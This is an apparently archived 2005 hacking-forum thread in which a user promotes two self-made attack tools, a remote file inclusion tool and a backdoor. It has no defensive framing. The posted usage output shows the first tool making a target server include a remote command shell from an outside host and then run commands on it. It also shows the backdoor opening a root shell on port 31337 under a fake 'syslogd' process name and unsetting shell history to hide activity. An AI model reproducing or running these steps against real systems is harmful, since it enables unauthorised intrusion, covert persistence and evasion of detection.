Waraxe IT Security Portal
Login or Register
April 19, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 182
Members: 0
Total: 182
Full disclosure
83 vulnerabilities in Vasion Print / PrinterLogic
[CVE-2025-32102, CVE-2025-32103] SSRF and Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)
Re: APPLE-SA-03-11-2025-2 iOS 18.3.2 and iPadOS 18.3.2
[KIS-2025-01] UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.ph p) PHP Object Injection Vulnerability
OXAS-ADV-2025-0001: OX App Suite Security Advisory
APPLE-SA-04-01-2025-1 watchOS 11.4
APPLE-SA-03-31-2025-11 visionOS 2.4
APPLE-SA-03-31-2025-10 tvOS 18.4
APPLE-SA-03-31-2025-9 macOS Ventura 13.7.5
APPLE-SA-03-31-2025-8 macOS Sonoma 14.7.5
APPLE-SA-03-31-2025-7 macOS Sequoia 15.4
APPLE-SA-03-31-2025-6 iOS 15.8.4 and iPadOS 15.8.4
APPLE-SA-03-31-2025-5 iOS 16.7.11 and iPadOS 16.7.11
APPLE-SA-03-31-2025-4 iPadOS 17.7.6
APPLE-SA-03-31-2025-3 iOS 18.4 and iPadOS 18.4
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> 2 stupid programs but useful
Post new topicReply to topic View previous topic :: View next topic
2 stupid programs but useful
PostPosted: Sat Apr 16, 2005 2:59 pm Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




jajaj ok i know most of u r going to say that is lame mmm but well trying coding one...
Peace


NST-RFITool
Code:
/*
Name: NST-RFITool v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN <hck_zatan@hotmail.com>
Date: 02/04/05
Description: RFI Tool as well. Remote :) With shell :) =)

root@NeoSecurity:/home/hackzatan# ./NST-RFITool
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
[+] Usage: ./NST-RFITool <Host> <Archivo_Rfi> <cmd> <Shell_or_Command>
[+] example: ./NST-RFITool localhost /index.php "?&cmd=" "http://host.com/shell.gif"
[+] http://localhost/index.php?&cmd=id
['] Or you could use
[+] http://localhost/index.php?&cmd=http://host.com/shell.gif
root@NeoSecurity:/home/hackzatan# ./NST-RFITool localhost /index.php "?&cmd=" "http://saure.lithyum.org/0/cmd.gif?&cmd="
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
Starting NST-Shell...
(ctrl+c to exit)
Connecting localhost:80

NShell> id;uname -a;uptime;ls

uid=99(nobody) gid=98(nobody) groups=98(nobody)
Linux NeoSecurity 2.4.29 #6 Thu Jan 20 16:30:37 PST 2005 i686 unknown unknown GNU/Linux
21:40:51 up 11:33, 1 user, load average: 0.00, 0.02, 0.00
apache_pb.gif
index.php
END
NShell>
root@NeoSecurity:/home/hackzatan#

Under GPL
I accept no responsibilty for any damage caused by it.
Additons and fixes always welcome.
*/



NST-Backdoor
Code:
/*
Name: NST-Backdoor v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN
Date: 31/03/05 17:51
Description: Backdoor!!

root@NeoSecurity:/home/hackzatan# pico NST-Backdoor.c
root@NeoSecurity:/home/hackzatan# gcc NST-Backdoor.c -o NST-Backdoor
root@NeoSecurity:/home/hackzatan# ./NST-Backdooor
[+] NST-Backdoor v0.1 by HaCkZaTaN
[+] NeoSecurity
[*] Usage: ./NST-Backdoor <port>
root@NeoSecurity:/home/hackzatan# ./NST-Backdoor 31337
[+] NST-Backdoor v0.1 by HaCkZaTaN
[*] Connecting...
[*] Spawning Shell on port 31337. PID is 1887.
root@NeoSecurity:/home/hackzatan# ps -aux | grep syslogd-nst
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 1888 0.0 0.5 1256 344 pts/0 S 18:46 0:00 syslogd-nst oor 31337
root@NeoSecurity:/home/hackzatan# telnet localhost 31337
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
NST-Backdoor v0.1 - Have a lot of fun..
"export TERM=xterm; unset HISTFILE; unset SAVEHIST"sh-3.00#
sh-3.00# sh-3.00# export TERM=xterm; unset HISTFILE; unset SAVEHIST
sh-3.00# sh-3.00# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
sh-3.00# sh-3.00#

*/
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 5:40 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




where was the code ?

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 17, 2005 5:50 am Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




There is a link You dont see iit Smile

Well i post it again is in .rar

NST-RFITool

NST-Backdoor

Peace
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 6:05 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




sorry bout that,
coz i just see you put a detailed how to use it in "[code]" place ,n it would be great if u put the real code in "[code]" place, so we could see a source code.

but its oke

peace too

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
2 stupid programs but useful
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.044 Seconds